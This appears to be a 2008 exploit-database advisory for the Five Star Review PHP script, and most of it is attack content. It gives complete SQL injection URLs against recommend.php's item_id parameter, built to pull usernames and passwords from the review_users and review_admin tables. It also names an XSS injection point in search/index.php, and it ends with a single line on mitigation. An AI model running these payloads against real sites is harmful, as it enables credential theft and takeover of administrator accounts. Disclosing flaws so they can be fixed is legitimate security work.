vendor:
Five Star Review
by:
Mr.SQL
7.5
CVSS
HIGH
XSS / Remote SQL Injection
N/A
CWE
Product Name: Five Star Review
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit:
N/A
Other Scripts:
N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References:
N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2008
XSS / Remote SQL Injection
Five Star Review ( recommend.php item_id ) is vulnerable to XSS and Remote SQL Injection. User Exploite >> www.TraGet.com/recommend.php?item_id=1'+union+select+0,concat_ws(0x3a,username,passtext),0,concat_ws(0x3a,username,passtext),0,0,0,0,0,0,0+from+review_users+limit+1,1/* and Admin Exploite >> www.TraGet.com/recommend.php?item_id=1'+union+select+0,concat_ws(0x3a,username,passtext),0,concat_ws(0x3a,username,passtext),0,0,0,0,0,0,0+from+review_admin/*. XSS can be exploited by using www.TraGet.com/search/index.php?cmd=search&words= [[ XSS ]] &searchWhere=0&mode=normal.
Mitigation:
Input validation and sanitization should be done to prevent XSS and SQL Injection.